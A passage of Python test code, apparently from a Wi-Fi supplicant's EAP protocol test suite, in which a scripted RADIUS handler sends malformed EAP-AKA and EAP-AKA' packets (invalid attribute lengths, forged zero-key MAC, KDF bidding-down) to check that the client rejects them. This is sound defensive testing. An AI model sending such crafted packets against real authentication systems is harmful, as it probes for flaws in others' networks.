                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with BIDDING")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_BIDDING, 1, 0x8000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but no MAC")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but invalid MAC value")
            return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success with zero-key MAC")
            # ctx['id'] - 2 keeps the identifier aligned with the frame the
            # precomputed zero-key MAC was generated for.
            return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
                               ctx['id'] - 2,
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0,
                               0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
                               0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16384)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16385)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with unrecognized non-failure")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Re-authentication (unexpected) with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with mismatching Checkcode value")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Fixed typo in log message ("claimin" -> "claiming")
            logger.info("Test: Re-authentication (unexpected) with Checkcode claiming identity round was used")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
                               0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RAND length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RAND, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_AUTN length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_AUTN, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_PADDING")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PADDING, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_NONCE_MT length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NONCE_MT, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_MAC length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_MAC, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_NOTIFICATION length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AT_IDENTITY overflow")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_IDENTITY, 1, 0xffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_SELECTED_VERSION length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_COUNTER")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_COUNTER, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NONCE_S")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NONCE_S, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_IV length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_IV, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_ENCR_DATA length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RES length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RES, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RES length")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_AUTS length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_AUTS, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_CHECKCODE length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_CHECKCODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RESULT_IND length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RESULT_IND, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_KDF")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_BIDDING length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_BIDDING, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(aka_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler case.
        for i in range(0, 49):
            # Step 11 uses both AKA and AKA' to exercise the bidding-down case.
            eap = "AKA AKA'" if i == 11 else "AKA"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap=eap, identity="0232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Steps 0 and 15 do not end in an explicit EAP-Failure event.
            if i in [ 0, 15 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
    """EAP-AKA' protocol tests"""
    def aka_prime_handler(ctx, req):
        # Server-side EAP handler driven by the test RADIUS server.
        # ctx['num'] counts the EAP responses received so far and is matched
        # against the running idx counter below to select which hand-crafted
        # (mostly malformed) EAP-AKA' request to send next. Returning None
        # ends the dialogue.
        # NOTE: req.encode("hex") is a Python 2 str idiom; this file predates
        # the Python 3 port.
        logger.info("aka_prime_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        # The EAP Identifier field is a single octet; wrap around at 256.
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        # Each struct.pack() below builds a raw EAP packet:
        # code, identifier, total length, then the EAP-AKA' payload
        # (method type, subtype, reserved, followed by TLV attributes).
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_AKA_PRIME)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with empty AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with duplicated KDF")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 2,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with incorrect KDF selected")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF not duplicated")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
